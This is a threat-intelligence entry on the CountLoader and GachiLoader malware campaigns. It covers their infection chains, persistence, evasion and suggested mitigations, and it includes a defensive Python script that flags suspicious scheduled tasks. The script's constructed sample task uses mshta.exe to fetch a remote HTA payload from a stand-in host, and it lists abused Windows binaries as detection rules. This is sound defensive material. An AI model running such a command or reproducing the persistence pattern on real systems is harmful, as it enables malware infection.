
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Severity: Medium
Category: Malware
Published: Fri Dec 19 2025 (12/19/2025, 15:34:00 UTC)
Source: The Hacker News

Description

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence

AI-Powered Analysis

Last updated: 12/19/2025, 15:43:11 UTC

Technical Analysis

The disclosed campaign utilizes cracked software distribution sites and compromised YouTube accounts to propagate two sophisticated malware loaders: CountLoader and GachiLoader. CountLoader, active since mid-2025, is a modular loader designed for stealth and persistence. Infection begins when users download cracked versions of legitimate software, such as Microsoft Word, which redirect them to malicious MediaFire-hosted ZIP archives. These archives contain an encrypted ZIP and a Word document with the password, leading to execution of a renamed Python interpreter configured to download CountLoader via mshta.exe.

CountLoader establishes persistence by creating scheduled tasks mimicking legitimate Google tasks, running every 30 minutes for up to 10 years. It detects security tools like CrowdStrike Falcon and adapts its execution accordingly. Its capabilities include downloading and executing executables, DLLs, MSI installers, and Python modules; removing its own scheduled tasks; collecting extensive system information; spreading via USB drives by creating malicious shortcuts; and executing payloads directly in memory using mshta.exe or PowerShell. The final payload observed is ACR Stealer, an information stealer targeting sensitive data.

Meanwhile, GachiLoader is a heavily obfuscated Node.js-based loader distributed through the YouTube Ghost Network, a collection of compromised YouTube accounts uploading malicious videos. GachiLoader employs advanced anti-analysis techniques, including privilege escalation attempts and disabling Microsoft Defender components by killing SecHealthUI.exe and setting exclusions. It uses a novel PE injection technique via Vectored Exception Handling to load malicious payloads stealthily. GachiLoader can deploy additional malware such as the Rhadamanthys stealer.
Both loaders demonstrate advanced evasion tactics, including fileless execution, signed binary abuse, and multi-stage infection chains, complicating detection and remediation efforts. The campaign highlights evolving malware sophistication and the exploitation of popular platforms and software piracy to reach victims.

Potential Impact

European organizations face significant risks from this campaign due to the widespread use of targeted legitimate software (e.g., Microsoft Word) and the popularity of YouTube as an information source. The malware’s ability to steal sensitive data through information stealers like ACR Stealer and Rhadamanthys threatens confidentiality and privacy, potentially leading to data breaches, intellectual property theft, and regulatory non-compliance under GDPR. The persistence mechanisms and stealthy execution increase the likelihood of prolonged undetected infections, enabling attackers to maintain access and conduct further malicious activities such as lateral movement or ransomware deployment. The USB propagation capability raises concerns for organizations with removable media usage policies, increasing infection vectors. Disabling or circumventing endpoint security tools like Microsoft Defender and CrowdStrike Falcon reduces detection efficacy, complicating incident response. The use of legitimate tools (mshta.exe, PowerShell, rundll32.exe) for execution and the abuse of signed binaries further hinder traditional signature-based defenses. This campaign could disrupt business operations, damage reputation, and incur financial losses. The multi-stage, modular nature of the malware allows attackers to tailor payloads to specific targets, increasing the threat’s adaptability and impact.

Mitigation Recommendations

1. Implement strict application whitelisting to prevent execution of unauthorized or renamed binaries, especially those masquerading as legitimate tools like Python interpreters.
2. Monitor and audit scheduled tasks for suspicious entries, particularly those mimicking legitimate services with unusual names or long durations.
3. Restrict or disable execution of mshta.exe, PowerShell, and rundll32.exe scripts from untrusted sources or user contexts where not required.
4. Enforce strict controls and scanning on removable media to detect and block malicious shortcuts (LNK files) and payloads.
5. Deploy advanced endpoint detection and response (EDR) solutions capable of detecting fileless execution, signed binary abuse, and anomalous behavior patterns.
6. Conduct user awareness training emphasizing the risks of downloading cracked software and interacting with untrusted links or YouTube content.
7. Regularly update and patch all software, including security tools, to mitigate exploitation of known vulnerabilities.
8. Utilize network monitoring to detect unusual outbound connections to command-and-control servers, especially those initiated by mshta.exe or PowerShell.
9. Implement multi-factor authentication and least privilege principles to limit malware’s ability to escalate privileges or persist.
10. Collaborate with threat intelligence providers to stay informed about emerging indicators of compromise related to CountLoader and GachiLoader.
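The persistence pattern described in the technical analysis (a task named after a Google component, repeating every 30 minutes for up to 10 years, launching mshta.exe) maps directly onto mitigation 2. The following triage script is an added example, not code from the article, Cyderes, or the page's analysis; it parses exported Task Scheduler XML (the files under %SystemRoot%\System32\Tasks, which are UTF-16 XML in the mit/task namespace) and flags tasks on three heuristics chosen here as assumptions: a repetition interval of an hour or less combined with a duration of a year or more, an action whose executable is a script host or interpreter, and a task name that borrows the Google name while the binary does not live under a Google directory. The two task definitions embedded in the block are constructed for the example.

```python
"""Flag Task Scheduler definitions that match the CountLoader-style persistence pattern.

Added example, not the article's or any vendor's code. Scoring rules are assumptions:
  1. repetition Interval <= 1 hour with Duration >= 1 year
  2. the action's executable is a script host / interpreter (mshta, PowerShell, ...)
  3. the task name borrows the Google name but the binary is not under a Google directory
The two sample task definitions at the bottom are constructed for this example.
"""
import re
import sys
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "python.exe", "pythonw.exe"}
_DURATION = re.compile(
    r"^P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """Seconds in an ISO 8601 duration as written in task XML (PT30M, P3650D); None if malformed."""
    m = _DURATION.match(text or "")
    if not m:
        return None
    y, mo, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return (((y * 365 + mo * 30 + d) * 24 + h) * 60 + mi) * 60 + s


@dataclass
class Finding:
    task: str
    command: str
    reasons: list = field(default_factory=list)


def triage_task_xml(xml_data, task_name):
    """Score one task definition (str or bytes); the returned Finding lists every rule it tripped."""
    root = ET.fromstring(xml_data)
    exec_el = root.find("./t:Actions/t:Exec", NS)
    command = exec_el.findtext("t:Command", default="", namespaces=NS) if exec_el is not None else ""
    args = exec_el.findtext("t:Arguments", default="", namespaces=NS) if exec_el is not None else ""
    reasons = []
    # Rule 1: short repetition interval paired with a multi-year duration.
    for rep in root.findall(".//t:Triggers//t:Repetition", NS):
        interval = iso_duration_seconds(rep.findtext("t:Interval", default="", namespaces=NS))
        duration = iso_duration_seconds(rep.findtext("t:Duration", default="", namespaces=NS))
        if (interval is not None and duration is not None
                and interval <= 3600 and duration >= 365 * 86400):
            reasons.append(f"repeats every {interval // 60} min for {duration // 86400} days")
    # Rule 2: the action is a script host or interpreter rather than a product binary.
    exe = command.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe in LOLBINS:
        reasons.append(f"action runs {exe}")
    # Rule 3: vendor name in the task name, executable somewhere else entirely.
    if "google" in task_name.lower() and "\\google\\" not in command.lower():
        reasons.append("task name claims Google but binary is not under a Google directory")
    return Finding(task_name, f"{command} {args}".strip(), reasons)


def triage_directory(tasks_dir):
    """Walk a copy of the Tasks folder (UTF-16 XML files, no extension) and return flagged tasks."""
    findings = []
    for path in Path(tasks_dir).rglob("*"):
        if path.is_file():
            try:
                finding = triage_task_xml(path.read_bytes(), path.name)  # bytes: expat honours the BOM
            except ET.ParseError:
                continue
            if finding.reasons:
                findings.append(finding)
    return findings


# Constructed sample: what a legitimate updater task roughly looks like (daily, vendor path).
BENIGN_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Google LLC</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command><Arguments>/c</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: the pattern from the analysis (30-minute repetition, 10-year duration, mshta).
SUSPICIOUS_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Google LLC</Author></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2025-12-01T00:00:00</StartBoundary>
    <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\mshta.exe</Command><Arguments>http://stage.example/loader.hta</Arguments>
  </Exec></Actions>
</Task>"""

SAMPLE_TASKS = {"GoogleUpdateTaskMachineCore": BENIGN_TASK_XML, "Google Update Helper": SUSPICIOUS_TASK_XML}

if __name__ == "__main__":
    if len(sys.argv) > 1:      # python triage_tasks.py <exported Tasks folder>
        results = triage_directory(sys.argv[1])
    else:                      # no argument: run against the constructed samples
        results = [triage_task_xml(x, n) for n, x in SAMPLE_TASKS.items()]
    for f in results:
        print(f"[{'SUSPICIOUS' if f.reasons else 'ok'}] {f.task}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against a copy of the Tasks folder collected from a host (a forensic image or a file copy taken with admin rights) rather than live, so the triage does not depend on the host's own scheduling service, which CountLoader is described as manipulating. Rule 1 is the most durable of the three: renaming the task or swapping mshta.exe for PowerShell defeats rules 2 and 3, but a loader that wants a 30-minute beacon for years still has to write that cadence into the trigger.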


Technical Details

Article Source: https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html (fetched 2025-12-19T15:42:53Z, 1,511 words)

Threat ID: 6945727d133fda1465b9bd26

Added to database: 12/19/2025, 3:42:53 PM

Last enriched: 12/19/2025, 3:43:11 PM

Last updated: 12/19/2025, 9:28:08 PM